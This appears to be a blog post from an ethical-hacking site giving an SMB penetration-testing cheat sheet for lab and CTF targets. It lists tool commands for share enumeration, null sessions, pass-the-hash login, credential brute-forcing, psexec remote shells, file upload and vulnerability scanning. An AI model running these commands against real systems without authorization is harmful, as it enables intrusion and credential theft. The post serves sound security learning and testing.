SMB Pentest Checklist

June 30, 2022

 

SMB Enumeration 

smbmap -H 10.10.10.10          //Check Privileges 

smbmap -H 10.10.10.10 -R --depth 5

smbclient -L //10.10.10.10/            //List Shares

smbclient //10.10.10.10/Users      //Interactive shell to a share 

smbclient  \\\\10.10.10.10\\share$     //Open a Null Session

smbclient //friendzone.htb/general -U ""    //see files inside

smbclient -N -L //10.10.10.10/      //List Shares as Null User

psexec.py administrator@10.10.10.10         //Enter pass later

smbmap -u Administrator -p 'Password@1' -H 10.10.10.10

smbclient -U 'administrator%Password@1' \\\\\10.10.10.10\\c$

once logged in;

put filename               //can upload any file

#access SMB shares via Windows CMD
net view \\192.168.1.17 /All

#Using Kerberos ticket with Smbclient 
smbclient -k -L //10.10.10.10/ 

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares 
crackmapexec smb 10.10.10.10 --shares


#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10


#access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds 
#Starting SMB Server
sudo smbserver.py share $(pwd)
#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#passing blank creds via smb
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15  smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success 

SMB Enum using Nmap 

#SMB Users Enum
nmap -Pn -sV --script smb-enum-users.nse -p445 IP_Address

#SMB OS Discovery
nmap -Pn -sV --script smb-os-discovery IP_Address

#SMB Protocol Discovery
nmap -Pn -sV --script smb-protocols IP_Address 

#SMB Shares Enum
nmap -Pn -sV --script smb-enum-shares -p139,445 IP_Address
nmap -Pn -sV --script smb-enum-shares IP_Address

#SMB Vuln Scan
nmap -Pn -sV --script smb-vuln* IP_Address
#SMB Shares Enum using RPCClient
rpcclient -U "" -N IP_Address
netshareenum
netshareenumall

#Enum Using Metasploit 
use auxiliary/scanner/smb/smb_enumshares
set rhosts IP_Address
exploit



Also refer to Windows Privilege Escalation Cheatsheet & Linux Privilege Escalation Cheatsheet



,
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment